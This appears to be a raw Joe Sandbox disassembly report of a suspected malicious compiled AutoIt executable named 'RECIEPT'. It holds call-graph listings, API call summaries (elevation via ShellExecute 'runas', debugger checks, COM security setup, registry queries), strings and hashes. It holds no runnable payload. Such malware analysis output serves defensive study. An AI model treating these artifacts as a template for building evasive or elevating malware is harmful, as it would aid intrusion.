__fcloseall 82 API calls 88010->88013 88011->87436 88012 44b28f 88035 4320f8 46 API calls _free 88012->88035 88013->88011 88015 44b295 88016 44b2a2 88015->88016 88018 414a46 __fcloseall 82 API calls 88015->88018 88017 44b2b2 88016->88017 88019 414a46 __fcloseall 82 API calls 88016->88019 88017->87436 88018->88016 88019->88017 88021 4321cb 88020->88021 88023 4321b4 __tzset_nolock _memmove 88020->88023 88022 414d04 __fread_nolock 61 API calls 88021->88022 88022->88023 88023->87994 88025 4135bb _malloc 46 API calls 88024->88025 88026 432150 88025->88026 88027 4135bb _malloc 46 API calls 88026->88027 88028 432162 88027->88028 88029 4135bb _malloc 46 API calls 88028->88029 88030 432174 88029->88030 88032 432189 88030->88032 88036 4320f8 46 API calls _free 88030->88036 88032->88004 88033 432198 88033->88004 88034->88012 88035->88015 88036->88033 88037->87337 88038->87341 88039->87358 88040->87358 88041->87358 88042->87353 88043->87358 88044->87358 88045->87364 88046->87373 88047->87371 88048->87371 88098 410160 88049->88098 88051 41012f GetFullPathNameW 88052 410147 ctype 88051->88052 88052->87200 88054 4102cb SHGetDesktopFolder 88053->88054 88056 410333 _wcsncpy 88053->88056 88055 4102e0 _wcsncpy 88054->88055 88054->88056 88055->88056 88057 41031c SHGetPathFromIDListW 88055->88057 88056->87203 88057->88056 88059 425f4a 88058->88059 88060 4101bb 88058->88060 88062 4114ab __wcsicoll 58 API calls 88059->88062 88065 425f6e 88059->88065 88061 410160 52 API calls 88060->88061 88063 4101c7 88061->88063 88062->88059 88102 410200 52 API calls 2 library calls 88063->88102 88065->87205 88066 4101d6 88103 410200 52 API calls 2 library calls 88066->88103 88068 4101e9 88068->87205 88070 40f760 128 API calls 88069->88070 88071 40f584 88070->88071 88072 429335 88071->88072 88073 40f58c 88071->88073 88076 4528bd 118 API calls 88072->88076 88074 40f598 88073->88074 88075 429358 88073->88075 88128 4033c0 113 API calls 7 library calls 88074->88128 88129 434034 86 API calls _wprintf 88075->88129 88079 42934b 88076->88079 88082 429373 88079->88082 88083 42934f 88079->88083 88080 429369 88080->88082 88081 40f5b4 88081->87201 88084 4115d7 52 API calls 88082->88084 88085 431e58 82 API calls 88083->88085 88090 4293c5 ctype 88084->88090 88085->88075 88086 42959c 88087 413748 _free 46 API calls 88086->88087 88090->88086 88095 401b10 52 API calls 88090->88095 88104 444af8 88090->88104 88107 44b41c 88090->88107 88114 402780 88090->88114 88122 4022d0 88090->88122 88130 44c7dd 64 API calls 3 library calls 88090->88130 88095->88090 88099 410167 _wcslen 88098->88099 88100 4115d7 52 API calls 88099->88100 88101 41017e _wcscpy 88100->88101 88101->88051 88102->88066 88103->88068 88105 4115d7 52 API calls 88104->88105 88106 444b27 _memmove 88105->88106 88106->88090 88108 44b429 88107->88108 88109 4115d7 52 API calls 88108->88109 88115 402827 88114->88115 88118 402790 ctype _memmove 88114->88118 88117 4115d7 52 API calls 88115->88117 88117->88118 88123 40239d 88122->88123 88124 4022e0 88122->88124 88123->88090 88124->88123 88128->88081 88129->88080 88130->88090 88132 402417 88131->88132 88136 402539 ctype 88131->88136 88133 4115d7 52 API calls 88132->88133 88132->88136 88134 402443 88133->88134 88135 4115d7 52 API calls 88134->88135 88138 4024b4 88135->88138 88136->87209 88138->88136 88139 4022d0 52 API calls 88138->88139 88160 402880 95 API calls 2 library calls 88138->88160 88139->88138 88144 401566 88140->88144 88141 401794 88161 40e9a0 90 API calls 88141->88161 88144->88141 88145 4010a0 52 API calls 88144->88145 88146 40167a 88144->88146 88145->88144 88147 4017c0 88146->88147 88162 45e737 90 API calls 3 library calls 88146->88162 88147->87212 88149 40bc70 52 API calls 88148->88149 88158 40d451 88149->88158 88150 40d50f 88165 410600 52 API calls 88150->88165 88152 427c01 88166 45e737 90 API calls 3 library calls 88152->88166 88153 40e0a0 52 API calls 88153->88158 88155 401b10 52 API calls 88155->88158 88156 40d519 88156->87214 88158->88150 88158->88152 88158->88153 88158->88155 88158->88156 88163 40f310 53 API calls 88158->88163 88164 40d860 91 API calls 88158->88164 88160->88138 88161->88146 88162->88147 88163->88158 88164->88158 88165->88156 88166->88156 88167->87227 88168->87228 88170 4091c6 88169->88170 88171 42c5fe 88169->88171 88170->87255 88171->88170 88172 40bc70 52 API calls 88171->88172 88173 42c64e InterlockedIncrement 88172->88173 88174 42c665 88173->88174 88179 42c697 88173->88179 88176 42c672 InterlockedDecrement Sleep InterlockedIncrement 88174->88176 88174->88179 88175 42c737 InterlockedDecrement 88177 42c74a 88175->88177 88176->88174 88176->88179 88180 408f40 VariantClear 88177->88180 88178 42c731 88178->88175 88179->88175 88179->88178 88181 408e80 VariantClear 88179->88181 88182 42c752 88180->88182 88184 42c6cf 88181->88184 88183 410c60 VariantClear 88182->88183 88183->88170 88185 45340c 85 API calls 88184->88185 88186 42c6db 88185->88186 88187 402160 52 API calls 88186->88187 88188 42c6e5 88187->88188 88189 45340c 85 API calls 88188->88189 88190 42c6f1 88189->88190 88444 40d200 52 API calls 2 library calls 88190->88444 88228 40afc4 88227->88228 88229 40b156 88227->88229 88230 40afd5 88228->88230 88231 42d1e3 88228->88231 88452 45e737 90 API calls 3 library calls 88229->88452 88234 40a780 197 API calls 88230->88234 88252 40b11a ctype 88230->88252 88453 45e737 90 API calls 3 library calls 88231->88453 88236 40b00a 88234->88236 88235 42d1f8 88239 408f40 VariantClear 88235->88239 88236->88235 88242 40b012 88236->88242 88238 42d4db 88238->88238 88240 40b143 88239->88240 88240->87255 88241 40b04a 88251 40b05c ctype 88241->88251 88454 40e270 VariantClear ctype 88241->88454 88242->88241 88243 40b094 ctype 88242->88243 88244 42d231 VariantClear 88242->88244 88245 40b108 88243->88245 88247 42d425 ctype 88243->88247 88244->88251 88245->88252 88455 40e270 VariantClear ctype 88245->88455 88246 42d45a VariantClear 88246->88252 88247->88246 88247->88252 88249 4115d7 52 API calls 88249->88243 88251->88243 88251->88249 88252->88240 88456 45e737 90 API calls 3 library calls 88252->88456 88254 408fff 88253->88254 88269 40900d 88253->88269 88503 403ea0 52 API calls __cinit 88254->88503 88257 42c3f6 88506 45e737 90 API calls 3 library calls 88257->88506 88259 40a780 197 API calls 88259->88269 88260 42c44a 88508 45e737 90 API calls 3 library calls 88260->88508 88262 42c47b 88509 451b42 61 API calls 88262->88509 88264 42c4cb 88457 47faae 88264->88457 88265 42c564 88270 408f40 VariantClear 88265->88270 88268 42c548 88513 45e737 90 API calls 3 library calls 88268->88513 88269->88257 88269->88259 88269->88260 88269->88262 88269->88264 88269->88265 88269->88268 88273 409112 88269->88273 88275 4090df 88269->88275 88277 42c528 88269->88277 88281 4090ea 88269->88281 88287 4090f2 ctype 88269->88287 88505 4534e3 52 API calls 88269->88505 88507 40c4e0 197 API calls 88269->88507 88270->88287 88271 42c491 88271->88287 88510 45e737 90 API calls 3 library calls 88271->88510 88273->88268 88279 40912b 88273->88279 88275->88281 88282 408e80 VariantClear 88275->88282 88512 45e737 90 API calls 3 library calls 88277->88512 88279->88287 88504 403e10 53 API calls 88279->88504 88283 408f40 VariantClear 88281->88283 88282->88281 88283->88287 88285 40914b 88286 408f40 VariantClear 88285->88286 88286->88287 88287->87255 88289 425c87 88288->88289 88292 40d15f 88288->88292 88290 425cc7 88289->88290 88291 425ca1 TranslateAcceleratorW 88289->88291 88291->88292 88292->87255 88294 42602f 88293->88294 88297 40d17f 88293->88297 88294->87255 88295 42608e IsDialogMessageW 88296 40d18c 88295->88296 88295->88297 88296->87255 88297->88295 88297->88296 88700 430c46 GetClassLongW 88297->88700 88300 4096c6 _wcslen 88299->88300 88301 4115d7 52 API calls 88300->88301 88362 40a70c ctype _memmove 88300->88362 88302 4096fa _memmove 88301->88302 88304 4115d7 52 API calls 88302->88304 88303 4013a0 52 API calls 88305 4297aa 88303->88305 88306 40971b 88304->88306 88308 4115d7 52 API calls 88305->88308 88307 409749 CharUpperBuffW 88306->88307 88310 40976a ctype 88306->88310 88306->88362 88307->88310 88349 4297d1 _memmove 88308->88349 88357 4097e5 ctype 88310->88357 88702 47dcbb 199 API calls 88310->88702 88312 408f40 VariantClear 88313 42ae92 88312->88313 88314 410c60 VariantClear 88313->88314 88315 42aea4 88314->88315 88316 409aa2 88318 4115d7 52 API calls 88316->88318 88323 409afe 88316->88323 88316->88349 88317 40a689 88320 4115d7 52 API calls 88317->88320 88318->88323 88319 4115d7 52 API calls 88319->88357 88336 40a6af ctype _memmove 88320->88336 88321 409b2a 88325 429dbe 88321->88325 88387 409b4d ctype _memmove 88321->88387 88708 40b400 VariantClear VariantClear ctype 88321->88708 88322 40c2c0 52 API calls 88322->88357 88323->88321 88324 4115d7 52 API calls 88323->88324 88326 429d31 88324->88326 88331 429dd3 88325->88331 88709 40b400 VariantClear VariantClear ctype 88325->88709 88330 429d42 88326->88330 88705 44a801 52 API calls 88326->88705 88327 429a46 VariantClear 88327->88357 88328 409fd2 88333 40a045 88328->88333 88386 42a3f5 88328->88386 88340 40e0a0 52 API calls 88330->88340 88342 40e1c0 VariantClear 88331->88342 88331->88387 88338 4115d7 52 API calls 88333->88338 88334 408f40 VariantClear 88334->88357 88343 4115d7 52 API calls 88336->88343 88342->88387 88343->88362 88346 40ba10 52 API calls 88346->88357 88347 42a42f 88713 45e737 90 API calls 3 library calls 88347->88713 88725 45e737 90 API calls 3 library calls 88349->88725 88350 4299d9 88354 408f40 VariantClear 88350->88354 88353 429abd 88353->87255 88358 4299e2 88354->88358 88357->88316 88357->88317 88357->88319 88357->88322 88357->88327 88357->88334 88357->88336 88357->88346 88357->88349 88357->88350 88357->88353 88364 40a780 197 API calls 88357->88364 88365 42a452 88357->88365 88703 40c4e0 197 API calls 88357->88703 88704 40e270 VariantClear ctype 88357->88704 88367 410c60 VariantClear 88358->88367 88362->88303 88364->88357 88365->88312 88366 402780 52 API calls 88366->88387 88422 40a650 ctype 88367->88422 88369 4115d7 52 API calls 88369->88387 88370 41130a 51 API calls __cinit 88370->88387 88373 40a780 197 API calls 88373->88387 88375 401980 53 API calls 88375->88387 88376 408e80 VariantClear 88376->88387 88382 44a801 52 API calls 88382->88387 88712 47390f VariantClear 88386->88712 88387->88328 88387->88347 88387->88362 88387->88366 88387->88369 88387->88370 88387->88373 88387->88375 88387->88376 88387->88382 88387->88386 88392 409c95 88387->88392 88710 45f508 52 API calls 88387->88710 88711 403e10 53 API calls 88387->88711 88392->87255 88422->87255 88426->87255 88427->87238 88428->87243 88429->87255 88430->87255 88431->87255 88432->87255 88433->87278 88434->87278 88435->87278 88436->87278 88437->87278 88438->87278 88439->87278 88440->87278 88441->87278 88442->87255 88443->87235 88452->88231 88453->88235 88454->88251 88455->88252 88456->88238 88458 408e80 VariantClear 88457->88458 88461 47fb02 88458->88461 88462 47fc59 88461->88462 88464 47fc2b 88461->88464 88469 408f40 VariantClear 88461->88469 88481 47fcd4 88461->88481 88484 408e80 VariantClear 88461->88484 88499 47fc1d 88461->88499 88514 475a67 88461->88514 88542 47b291 88461->88542 88553 46fe32 VariantClear 88461->88553 88463 40a780 197 API calls 88462->88463 88467 47fc6a 88463->88467 88466 408f40 VariantClear 88464->88466 88468 47fc33 88466->88468 88467->88464 88471 47fc7d 88467->88471 88472 47fc8c 88467->88472 88470 408f40 VariantClear 88468->88470 88469->88461 88474 47fc3b 88470->88474 88555 45e737 90 API calls 3 library calls 88471->88555 88473 40ba10 52 API calls 88472->88473 88476 47fc98 88473->88476 88477 408f40 VariantClear 88474->88477 88556 47b2f4 144 API calls 88476->88556 88479 47fc43 88477->88479 88482 410c60 VariantClear 88479->88482 88480 47fca7 88483 408f40 VariantClear 88480->88483 88486 408f40 VariantClear 88481->88486 88485 47fc4b 88482->88485 88484->88461 88488 47fcdc 88486->88488 88490 408f40 VariantClear 88488->88490 88491 47fce4 88490->88491 88493 408f40 VariantClear 88491->88493 88495 47fcec 88493->88495 88497 410c60 VariantClear 88495->88497 88500 47fcf4 88497->88500 88554 45e538 90 API calls 3 library calls 88499->88554 88503->88269 88504->88285 88505->88269 88506->88287 88507->88269 88508->88287 88509->88271 88510->88287 88512->88287 88513->88265 88515 475ac5 88514->88515 88521 475ae5 88514->88521 88519 475b42 88515->88519 88520 402780 52 API calls 88515->88520 88515->88521 88517 475afe 88518 408f40 VariantClear 88517->88518 88523 475b06 88518->88523 88522 402780 52 API calls 88519->88522 88520->88515 88557 45e737 90 API calls 3 library calls 88521->88557 88532 475b60 88522->88532 88523->88461 88524 475c7c 88525 408f40 VariantClear 88524->88525 88529 475c84 88525->88529 88526 40a780 197 API calls 88526->88532 88527 40c2c0 52 API calls 88527->88532 88528 475cc7 88531 408f40 VariantClear 88528->88531 88529->88461 88530 40ba10 52 API calls 88530->88532 88535 475ca8 88531->88535 88532->88524 88532->88526 88532->88527 88532->88528 88532->88530 88533 475cd5 88532->88533 88534 408f40 VariantClear 88532->88534 88539 475ca0 88532->88539 88558 40c4e0 197 API calls 88532->88558 88559 45e737 90 API calls 3 library calls 88533->88559 88534->88532 88535->88461 88538 475ce8 88541 408f40 VariantClear 88539->88541 88541->88535 88543 47b2e7 88542->88543 88544 47b2a5 88542->88544 88543->88461 88560 40e710 88544->88560 88553->88461 88554->88464 88555->88464 88556->88480 88557->88517 88558->88532 88559->88538 88561 408f40 VariantClear 88560->88561 88562 40e71b 88561->88562 88563 4115d7 52 API calls 88562->88563 88564 40e729 88563->88564 88565 40e734 88564->88565 88566 426bdc 88564->88566 88700->88297 88702->88310 88703->88357 88704->88357 88705->88330 88708->88325 88709->88331 88710->88387 88711->88387 88712->88347 88713->88365 88725->88365 88726 42d154 88730 480a8d 88726->88730 88728 42d161 88729 480a8d 197 API calls 88728->88729 88729->88728 88731 480ae4 88730->88731 88732 480b26 88730->88732 88733 480aeb 88731->88733 88734 480b15 88731->88734 88735 40bc70 52 API calls 88732->88735 88736 480aee 88733->88736 88737 480b04 88733->88737 88763 4805bf 197 API calls 88734->88763 88758 480b2e 88735->88758 88736->88732 88739 480af3 88736->88739 88762 47fea2 197 API calls __itow_s 88737->88762 88761 47f135 197 API calls 88739->88761 88741 480aff 88745 408f40 VariantClear 88741->88745 88743 40e0a0 52 API calls 88743->88758 88747 481156 88745->88747 88746 40c2c0 52 API calls 88746->88758 88748 408f40 VariantClear 88747->88748 88749 48115e 88748->88749 88749->88728 88750 401980 53 API calls 88750->88758 88752 480ff5 88769 45e737 90 API calls 3 library calls 88752->88769 88753 40e710 53 API calls 88753->88758 88754 408e80 VariantClear 88754->88758 88755 40a780 197 API calls 88755->88758 88758->88741 88758->88743 88758->88746 88758->88750 88758->88752 88758->88753 88758->88754 88758->88755 88764 45377f 52 API calls 88758->88764 88765 45e951 53 API calls 88758->88765 88766 40e830 53 API calls 88758->88766 88767 47925f 53 API calls 88758->88767 88768 47fcff 197 API calls 88758->88768 88761->88741 88762->88741 88763->88741 88764->88758 88765->88758 88766->88758 88767->88758 88768->88758 88769->88741 88770 428905 88771 4115d7 52 API calls 88770->88771 88772 42890c 88771->88772 88773 428945 88772->88773 88774 42891f 88772->88774 88775 4115d7 52 API calls 88773->88775 88776 4115d7 52 API calls 88774->88776 88777 42894c 88775->88777 88778 428925 _memmove 88776->88778 88779 42b14b 88786 40bc10 88779->88786 88781 42b159 88782 4096a0 328 API calls 88781->88782 88783 42b177 88782->88783 88797 44b92d VariantClear 88783->88797 88785 42bc5b 88787 40bc24 88786->88787 88788 40bc17 88786->88788 88790 40bc2a 88787->88790 88791 40bc3c 88787->88791 88789 408e80 VariantClear 88788->88789 88793 40bc1f 88789->88793 88794 408e80 VariantClear 88790->88794 88792 4115d7 52 API calls 88791->88792 88796 40bc43 88792->88796 88793->88781 88795 40bc33 88794->88795 88795->88781 88796->88781 88797->88785 88798 425b2b 88803 40f000 88798->88803 88802 425b3a 88804 4115d7 52 API calls 88803->88804 88805 40f007 88804->88805 88806 4276ea 88805->88806 88812 40f030 88805->88812 88811 41130a 51 API calls __cinit 88811->88802 88813 40f039 88812->88813 88814 40f01a 88812->88814 88842 41130a 51 API calls __cinit 88813->88842 88816 40e500 88814->88816 88817 40bc70 52 API calls 88816->88817 88818 40e515 GetVersionExW 88817->88818 88819 402160 52 API calls 88818->88819 88820 40e557 88819->88820 88843 40e660 88820->88843 88826 427674 88830 4276c6 GetSystemInfo 88826->88830 88828 40e5e0 88832 4276d5 GetSystemInfo 88828->88832 88857 40efd0 88828->88857 88829 40e5cd GetCurrentProcess 88864 40ef20 LoadLibraryA GetProcAddress 88829->88864 88830->88832 88835 40e629 88861 40ef90 88835->88861 88838 40e641 FreeLibrary 88839 40e644 88838->88839 88840 40e653 FreeLibrary 88839->88840 88841 40e656 88839->88841 88840->88841 88841->88811 88842->88814 88844 40e667 88843->88844 88845 42761d 88844->88845 88846 40c600 52 API calls 88844->88846 88847 40e55c 88846->88847 88848 40e680 88847->88848 88849 40e687 88848->88849 88850 427616 88849->88850 88851 40c600 52 API calls 88849->88851 88852 40e566 88851->88852 88852->88826 88853 40ef60 88852->88853 88854 40e5c8 88853->88854 88855 40ef66 LoadLibraryA 88853->88855 88854->88828 88854->88829 88855->88854 88856 40ef77 GetProcAddress 88855->88856 88856->88854 88858 40e620 88857->88858 88859 40efd6 LoadLibraryA 88857->88859 88858->88830 88858->88835 88859->88858 88860 40efe7 GetProcAddress 88859->88860 88860->88858 88865 40efb0 LoadLibraryA GetProcAddress 88861->88865 88863 40e632 GetNativeSystemInfo 88863->88838 88863->88839 88864->88828 88865->88863 88866 425b5e 88871 40c7f0 88866->88871 88870 425b6d 88906 40db10 52 API calls 88871->88906 88873 40c82a 88907 410ab0 6 API calls 88873->88907 88875 40c86d 88876 40bc70 52 API calls 88875->88876 88877 40c877 88876->88877 88878 40bc70 52 API calls 88877->88878 88879 40c881 88878->88879 88880 40bc70 52 API calls 88879->88880 88881 40c88b 88880->88881 88882 40bc70 52 API calls 88881->88882 88883 40c8d1 88882->88883 88884 40bc70 52 API calls 88883->88884 88885 40c991 88884->88885 88908 40d2c0 52 API calls 88885->88908 88887 40c99b 88909 40d0d0 53 API calls 88887->88909 88889 40c9c1 88890 40bc70 52 API calls 88889->88890 88891 40c9cb 88890->88891 88910 40e310 53 API calls 88891->88910 88893 40ca28 88894 408f40 VariantClear 88893->88894 88895 40ca30 88894->88895 88896 408f40 VariantClear 88895->88896 88897 40ca38 GetStdHandle 88896->88897 88898 429630 88897->88898 88899 40ca87 88897->88899 88898->88899 88900 429639 88898->88900 88905 41130a 51 API calls __cinit 88899->88905 88911 4432c0 57 API calls 88900->88911 88902 429641 88912 44b6ab CreateThread 88902->88912 88904 42964f CloseHandle 88904->88899 88905->88870 88906->88873 88907->88875 88908->88887 88909->88889 88910->88893 88911->88902 88912->88904 88913 44b5cb 58 API calls 88912->88913 88914 425b6f 88919 40dc90 88914->88919 88918 425b7e 88920 40bc70 52 API calls 88919->88920 88921 40dd03 88920->88921 88927 40f210 88921->88927 88923 40ddb7 88926 41130a 51 API calls __cinit 88923->88926 88924 40dd96 88924->88923 88930 40dc00 52 API calls 2 library calls 88924->88930 88926->88918 88931 40f250 RegOpenKeyExW 88927->88931 88929 40f230 88929->88924 88930->88924 88932 425e17 88931->88932 88933 40f275 RegQueryValueExW 88931->88933 88932->88929 88934 40f2c3 RegCloseKey 88933->88934 88935 40f298 88933->88935 88934->88929 88936 40f2a9 RegCloseKey 88935->88936 88937 425e1d 88935->88937 88936->88929
                                        APIs
                                        • _wcslen.LIBCMT ref: 004096C1
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • _memmove.LIBCMT ref: 0040970C
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                        • _memmove.LIBCMT ref: 00409D96
                                        • _memmove.LIBCMT ref: 0040A6C4
                                        • _memmove.LIBCMT ref: 004297E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                        • String ID:
                                        • API String ID: 2383988440-0
                                        • Opcode ID: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                        • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                        • Opcode Fuzzy Hash: 6ff525b2c59c7c054ff9d2bd3b1975f8866825bf581303900bce7b5d9fa65f40
                                        • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                          • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                          • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                        • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                        • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                          • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                        • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                        • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                          • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                          • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                          • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                          • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                          • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                          • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                        Strings
                                        • runas, xrefs: 0042E2AD, 0042E2DC
                                        • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                        • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                        • API String ID: 2495805114-3383388033
                                        • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                        • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1515 46cb5f-46cbc3 call 40bc70 * 3 call 408f40 1524 46cbd4-46cbe7 CLSIDFromProgID 1515->1524 1525 46cbc5-46cbcd OleInitialize 1515->1525 1526 46cc33-46cc47 1524->1526 1527 46cbe9-46cbf9 CLSIDFromString 1524->1527 1525->1524 1529 46cca6-46ccba call 458651 1526->1529 1530 46cc49-46cc60 CoCreateInstance 1526->1530 1527->1526 1528 46cbfb-46cc05 1527->1528 1531 46cc06-46cc30 call 451b42 call 402250 * 3 1528->1531 1533 46cc96-46cca1 1529->1533 1539 46ccbc-46ccf7 CoInitializeSecurity call 412f40 call 4311fc 1529->1539 1530->1533 1534 46cc62-46cc8b call 43119b 1530->1534 1533->1531 1548 46cc8e-46cc90 1534->1548 1553 46cdf4 1539->1553 1554 46ccfd-46cd1f call 402160 call 431a2b 1539->1554 1548->1533 1551 46ceb7-46cef0 call 468070 call 402250 * 3 1548->1551 1556 46cdfa-46ce4a call 412f40 CoCreateInstanceEx CoTaskMemFree 1553->1556 1567 46cd35-46cd41 call 465177 1554->1567 1568 46cd21-46cd33 1554->1568 1556->1533 1566 46ce50-46ce55 1556->1566 1566->1533 1570 46ce5b-46ce62 1566->1570 1578 46cd46-46cda3 call 40e0a0 call 402250 call 46150f call 40e0a0 call 402250 1567->1578 1571 46cda5-46cdaa 1568->1571 1574 46ce64-46ce8b CoSetProxyBlanket 1570->1574 1575 46ce8d-46ce9e 1570->1575 1576 46cdac-46cdbb call 4111c1 1571->1576 1577 46cdbd-46cdc0 1571->1577 1574->1575 1575->1548 1580 46cea4-46ceb2 1575->1580 1582 46cdc3-46cdf2 1576->1582 1577->1582 1578->1571 1580->1531 1582->1556
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                        • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                        • _wcslen.LIBCMT ref: 0046CDB0
                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                        Strings
                                        • NULL Pointer assignment, xrefs: 0046CEA6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
